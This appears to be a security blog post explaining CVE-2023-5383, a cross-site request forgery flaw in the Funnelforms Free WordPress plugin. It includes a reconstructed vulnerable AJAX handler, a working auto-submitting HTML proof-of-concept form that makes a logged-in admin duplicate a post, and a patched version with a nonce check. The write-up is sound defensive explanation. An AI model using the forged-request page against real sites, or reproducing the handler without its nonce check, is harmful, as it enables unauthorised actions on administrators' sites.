---
Published: June 2024
Affected Plugin: Funnelforms Free (≤ 3.4)
Vulnerability: Cross-Site Request Forgery (CSRF)
CVE: CVE-2023-5383
Severity: Medium
Impact: Unauthorized copying of arbitrary posts by tricking an administrator
Introduction
Security flaws in popular WordPress plugins can put millions of websites at risk. In this article, we're going to look at CVE-2023-5383, a Cross-Site Request Forgery (CSRF) vulnerability found in versions up to 3.4 of the Funnelforms Free plugin for WordPress.
This post explains how the bug works, how an attacker could take advantage of it, and what code is affected. All technical explanations and code are simplified for easier understanding.
What is CSRF?
Cross-Site Request Forgery (CSRF) is a type of attack where a malicious website tricks a user, who is logged into another site, into taking unwanted actions. In this case, Funnelforms Free is missing proper security checks (nonces) in a function that allows users to copy posts.
If an attacker tricks an administrator into clicking a link or visiting a page, they could cause copies of any post to be created in WordPress—without permission.
The Vulnerable Function: fnsf_copy_posts
Inside the plugin, there's a function called fnsf_copy_posts. It's meant to allow legitimate users to copy posts—maybe for form templates, for example. However, it fails to validate a WordPress nonce (a kind of security token), meaning anyone can fire this function with the right request.
The Problematic Code
Here's a simplified view of what the function might look like (based on standard WordPress AJAX handler templates):
add_action( 'wp_ajax_fnsf_copy_posts', 'fnsf_copy_posts' );
function fnsf_copy_posts() {
// MISSING: check_admin_referer( 'fnsf_copy_posts_action' );
$post_id = intval( $_POST['post_id'] );
$new_post = wp_insert_post( array(
'post_type' => get_post_type( $post_id ),
'post_title' => get_the_title( $post_id ) . ' (Copy)',
'post_content' => get_post_field( 'post_content', $post_id ),
'post_status' => 'draft',
) );
if ( $new_post ) {
wp_send_json_success( array( 'new_post_id' => $new_post ) );
} else {
wp_send_json_error();
}
}
> Missing Line:
> There should be a call to check_admin_referer() or similar nonce verification. Without it, any page can make the request!
How an Attacker Exploits This
CSRF succeeds when a logged-in admin clicks a link or visits a malicious page that silently makes a POST request to /wp-admin/admin-ajax.php with the right parameters.
Let’s see an attacker’s evil page that triggers the copy
<html>
<body>
<form id="csrfForm" method="POST" action="https://victimsite.com/wp-admin/admin-ajax.php">;
<input type="hidden" name="action" value="fnsf_copy_posts">
<input type="hidden" name="post_id" value="3"> <!-- ID to copy -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
If the victim (site admin) is logged in and visits this page, post ID 3 gets duplicated on their WordPress site, without their consent!
Responsible Disclosure and Fix
- Reported by: Wordfence
- Patched in: Funnelforms Free 3.4.1 (official changelog)
How it was patched:
The developer added nonce checks to the AJAX handler, meaning only legitimate authorized requests from the WordPress admin can copy posts.
Safe code
function fnsf_copy_posts() {
if ( ! check_admin_referer( 'fnsf_copy_posts_action' ) ) {
wp_send_json_error( 'Invalid nonce' );
return;
}
// ... existing logic ...
}
What Should You Do?
- Update Immediately: If you use Funnelforms Free on any website, update to *at least version 3.4.1*.
References
- NVD - CVE-2023-5383
- Funnelforms Free WordPress Plugin
- Wordfence Vulnerability Database: Funnelforms Free < 3.4.1 CSRF
- What is CSRF? (OWASP)
Conclusion
CVE-2023-5383 is a reminder that even minor plugin oversights can yield dangerous vulnerabilities. You can protect your WordPress site by keeping plugins up to date and regularly reviewing site changes or anomalies.
Stay safe!
*If you found this read useful, please share it with others who manage WordPress sites.*
Timeline
Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:12:46 UTC